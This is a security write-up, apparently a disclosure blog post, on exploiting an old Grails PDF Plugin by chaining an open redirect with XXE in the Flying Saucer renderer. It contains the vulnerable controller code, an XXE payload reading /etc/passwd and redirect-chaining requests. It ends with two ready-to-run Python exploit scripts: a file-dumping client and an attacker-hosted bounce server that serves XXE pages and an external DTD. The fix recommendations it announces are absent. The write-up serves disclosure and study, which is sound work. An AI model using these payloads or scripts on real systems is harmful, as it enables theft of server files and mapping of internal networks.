Some time ago, the Ambionics team encountered a very old instance of Grails, a Groovy-based MVC framework. This instance contained a plugin to generate PDFs from Groovy templates, quite simply named PDF Plugin. Looking for the plugin's source code, we found that it had not been maintained in the past 6 years, the last commit dating from August 3, 2011. Evidently, this caught our eye.
Extract from the plugin's README:
Pdf plugin allows a Grails application to generate PDFs and send them to the browser by converting existing pages in your application to PDF on the fly. The underlying system uses the xhtmlrenderer component from java.net along with iText to do the rendering.
Two important things can be noted:
Upon further inspection, it also appeared that Flying Saucer, the Java library which converts HTML to PDF, has the following properties:
As always, when we see an XML parser, we think about its XXE capability. What if we could read files on the server?
Here is the code of the main controller of the plugin, with comments of my own:
// The eponym method is called upon reaching the /pdf/pdfForm URL, and the
// params array is user-submitted GET/POST data
def pdfForm = {
    try{
        byte[] b
        // Build a base URI, something like
        // http://localhost:80/base_path/
        def baseUri = request.scheme + "://" + request.serverName + ":" + request.serverPort + grailsAttributes.getApplicationUri(request)

        // 1: If it is a GET call, append the url parameter to the base URI, fetch it via an HTTP request, and render it
        // For instance, if we fetch http://target.com/pdf/pdfForm?url=/test.html, it will try to render http://localhost/test.html
        if(request.method == "GET") {
            def url = baseUri + params.url + '?' + request.getQueryString()
            //println "BaseUri is $baseUri"
            //println "Fetching url $url"
            b = pdfService.buildPdf(url)
        }

        // 2: If it's a POST call, generate the HTML content from a controller and an action, and feed it to the generator
        if(request.method == "POST"){
            def content
            if(params.template){
                //println "Template: $params.template"
                content = g.render(template:params.template, model:[pdf:params])
            }
            else{
                content = g.include(controller:params.pdfController, action:params.pdfAction, id:params.id, pdf:params)
            }
            b = pdfService.buildPdfFromString(content.readAsString(), baseUri)
        }

        response.setContentType("application/pdf")
        response.setHeader("Content-disposition", "attachment; filename=" + (params.filename ?: "document.pdf"))
        response.setContentLength(b.length)
        response.getOutputStream().write(b)
    }
    // In case of error, redirect to the url specified by the url parameter
    catch (e) {
        println "there was a problem with PDF generation ${e}"
        if(params.template) render(template:params.template)
        if(params.url) redirect(uri:params.url + '?' + request.getQueryString())
        else redirect(controller:params.pdfController, action:params.pdfAction, params:params)
    }
}
From the code, it appears that the PDF plugin has two ways of generating a PDF:
As we do not control any Groovy template or controller on the server, we're not interested in the second option. The first one looks more promising: it issues an HTTP request to a local URI.
Although it might be useful sometimes (for instance to bypass an IP filter or to hit an HTTP service in the internal network), making the module fetch a local URI for us and return it as a PDF is not of great help. What we want is complete control of the HTML page that is fed to the PDF renderer.
Luckily, the solution is in the same piece of code: the catch block handles errors by redirecting us to the URL of our choice (params.url) whenever an exception is thrown during the PDF generation. Therefore, we have an open redirect: http://target.com/pdf/pdfForm?url=http://attacker.com/page.html will redirect us to http://attacker.com/page.html, because the code will try to send an HTTP request to http://target.com/http://attacker.com/page.html, which will fail, throwing an exception.
Therefore, by issuing a GET request to http://target.com/pdf/pdfForm?url=pdf/pdfForm?url=http://attacker.com/page.html (note the duplication of the pdf/pdfForm?url= part), this happens:
Let us try it by rendering a Hello world:
GET /page.html?url=/pdf/pdfForm?url=http://10.0.0.138/page.html?url=http://10.0.0.138/page.html?url=/pdf/pdfForm?url=http://10.0.0.138/page.html
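The request line above can be reproduced by replaying the controller's two string concatenations by hand. The sketch below is a simplified model, not the plugin's code: the function names and the `http://localhost:8080/` base URI are made up for the illustration, and it assumes the servlet container splits the query string on `&` and on the first `=` only, so that everything after the first `url=` ends up in params.url.

```python
from urllib.parse import parse_qs, urlsplit

BASE_URI = "http://localhost:8080/"  # assumed value of baseUri, for illustration


def url_param(query_string):
    """Value of the 'url' parameter, as we assume params.url would expose it."""
    return parse_qs(query_string)["url"][0]


def fetched_url(query_string):
    """GET branch: baseUri + params.url + '?' + request.getQueryString()."""
    return BASE_URI + url_param(query_string) + "?" + query_string


def error_redirect(query_string):
    """catch branch: redirect(uri: params.url + '?' + request.getQueryString())."""
    return url_param(query_string) + "?" + query_string


# 1. Query string of the request sent by the attacker.
outer_query = "url=/pdf/pdfForm?url=http://10.0.0.138/page.html"

# 2. URL the plugin fetches: the same controller again, on the target itself.
inner = urlsplit(fetched_url(outer_query))

# 3. The inner call tries to fetch baseUri + "http://...", fails, and redirects.
redirect = urlsplit(error_redirect(inner.query))

# 4. Request line received by the attacker's server once the redirect is followed.
request_line = "GET " + redirect.path + "?" + redirect.query
print(request_line)
```

Under these assumptions, the printed line is identical to the request observed on the bounce server, which explains the repeated `url=` segments: each pass through the controller appends the full query string once more.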
We're now able to make the server render a page of our choice! The first idea from this point was to use the file:// protocol instead of the standard http://; it did not work. It does not matter though, because this achievement widens our attack surface by a lot.
Now that we control our page, let's go ahead and verify Flying Saucer's promises.
For instance, let's ask it to render an image, with an <img src="image.jpg" /> tag:
Or some CSS:
It's now time to try a simple XXE:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html [
    <!ENTITY goodies SYSTEM "file:///etc/passwd">
]>
<html>
    <body>
        <!-- Since it's HTML after all, why not render our output nicely -->
        <pre>&goodies;</pre>
    </body>
</html>
Which yields:
Listing directories is also possible, via the same vector:
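Only the SYSTEM identifier changes between reading a file and listing a directory. A minimal sketch of a payload generator follows; `build_xxe_page` and `PAGE_TEMPLATE` are hypothetical names, and the directory URI `file:///etc/` is an assumed example rather than one taken from our tests.

```python
# Same document as the simple XXE above, with the resource left as a placeholder.
PAGE_TEMPLATE = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html [
    <!ENTITY goodies SYSTEM "[RESOURCE]">
]>
<html>
    <body>
        <pre>&goodies;</pre>
    </body>
</html>"""


def build_xxe_page(resource):
    """Return the XHTML page whose external entity points at `resource`."""
    # A double quote would close the SYSTEM literal and break the DOCTYPE.
    if '"' in resource:
        raise ValueError("resource must not contain a double quote")
    return PAGE_TEMPLATE.replace("[RESOURCE]", resource)


# One page per target: a file, then a directory (assumed example paths).
file_page = build_xxe_page("file:///etc/passwd")
dir_page = build_xxe_page("file:///etc/")
print(dir_page)
```

Each generated page is then served from the attacker's host and reached through the redirect described earlier.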
Using the CSS parsing capability of Flying Saucer and pdftotext, we are able to completely automate the process.
The exploitation allowed us to fetch critical data from the server, and helped us map the internal network.
Even if the plugin is not that recent, here are recommendations about how to fix it, without code-diving too much:
dump_file.py
#!/usr/bin/python3
# Grails PDF Plugin XXE
# cf
# https://www.ambionics.io/blog/grails-pdf-plugin-xxe

import requests
import sys
import os

# Base URL of the Grails target
URL = 'http://10.0.0.179:8080/grailstest'
# "Bounce" HTTP Server
BOUNCE = 'http://10.0.0.138:7777/'

session = requests.Session()
pdfForm = '/pdf/pdfForm?url='
renderPage = 'render.html'

# The resource to read is a mandatory argument
if len(sys.argv) < 2:
    print('usage: ./%s <resource>' % sys.argv[0])
    print('e.g.: ./%s file:///etc/passwd' % sys.argv[0])
    exit(0)

resource = sys.argv[1]

# Build the full URL
full_url = URL + pdfForm + pdfForm + BOUNCE + renderPage
full_url += '&resource=' + sys.argv[1]

r = requests.get(full_url, allow_redirects=False)
#print(full_url)

if r.status_code != 200:
    print('Error: %s' % r)
else:
    with open('/tmp/file.pdf', 'wb') as handle:
        handle.write(r.content)
    # pdftotext writes its output to /tmp/file.txt
    os.system('pdftotext /tmp/file.pdf')
    with open('/tmp/file.txt', 'r') as handle:
        print(handle.read(), end='')
server.py
#!/usr/bin/python3
# Grails PDF Plugin XXE
# cf
# https://www.ambionics.io/blog/grails-pdf-plugin-xxe
#
# Server part of the exploitation
#
# Start it in an empty folder:
# $ mkdir /tmp/empty
# $ mv server.py /tmp/empty
# $ /tmp/empty/server.py

import http.server
import socketserver
import sys

BOUNCE_IP = '10.0.0.138'
BOUNCE_PORT = int(sys.argv[1]) if len(sys.argv) > 1 else 80

# Template for the HTML page
template = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html [
<!ENTITY % start "<![CDATA[">
<!ENTITY % goodies SYSTEM "[RESOURCE]">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://[BOUNCE]/out.dtd">
%dtd;
]>
<html>
<head>
<style>
body { font-size: 1px; width: 1000000000px;}
</style>
</head>
<body>
<pre>&all;</pre>
</body>
</html>"""

# The external DTD trick allows us to get more files; they would've been invalid
# otherwise
# See: https://www.vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf
dtd = """<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY all "%start;%goodies;%end;">
"""

# Really hacky. When the render.html page is requested, we extract the
# 'resource=XXX' part of the URL and create an HTML file which XXEs it.
class GetHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        if 'render.html' in self.path:
            resource = self.path.split('resource=')[1]
            print('Resource: %s' % resource)
            page = template
            page = page.replace('[RESOURCE]', resource)
            page = page.replace('[BOUNCE]', '%s:%d' % (BOUNCE_IP, BOUNCE_PORT))

            with open('render.html', 'w') as handle:
                handle.write(page)

        return super().do_GET()


Handler = GetHandler
httpd = socketserver.TCPServer(("", BOUNCE_PORT), Handler)

with open('out.dtd', 'w') as handle:
    handle.write(dtd)

print("Started HTTP server on port %d, press Ctrl-C to exit..." % BOUNCE_PORT)

try:
    httpd.serve_forever()
except KeyboardInterrupt:
    print("Keyboard interrupt received, exiting.")
    httpd.server_close()
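Why the external DTD matters can be shown with a small model. The `all` entity glues `%start;`, `%goodies;` and `%end;` together, so the file content ends up inside a CDATA section; the declaration lives in out.dtd because XML forbids parameter-entity references inside declarations of the internal subset. The sketch below only imitates that expansion with string concatenation and Python's own XML parser; `expand_all`, `parses` and the sample content are made up for the illustration, and Flying Saucer's parser is not involved.

```python
import xml.etree.ElementTree as ET


def expand_all(file_content):
    """Imitate <!ENTITY all "%start;%goodies;%end;"> as plain concatenation."""
    start, end = "<![CDATA[", "]]>"
    return start + file_content + end


def parses(body):
    """True if <pre>body</pre> is well-formed XML."""
    try:
        ET.fromstring("<pre>" + body + "</pre>")
        return True
    except ET.ParseError:
        return False


# Made-up file content holding characters that are markup in XML.
sample = "if (a < b && c) { run(); }"

raw_ok = parses(sample)                  # inserted as-is, like &goodies;
wrapped_ok = parses(expand_all(sample))  # inserted through the CDATA wrapper
recovered = ET.fromstring("<pre>" + expand_all(sample) + "</pre>").text

print(raw_ok, wrapped_ok, recovered == sample)
```

The model has the same limit as the real trick: content that itself contains `]]>` closes the CDATA section early and still cannot be wrapped this way.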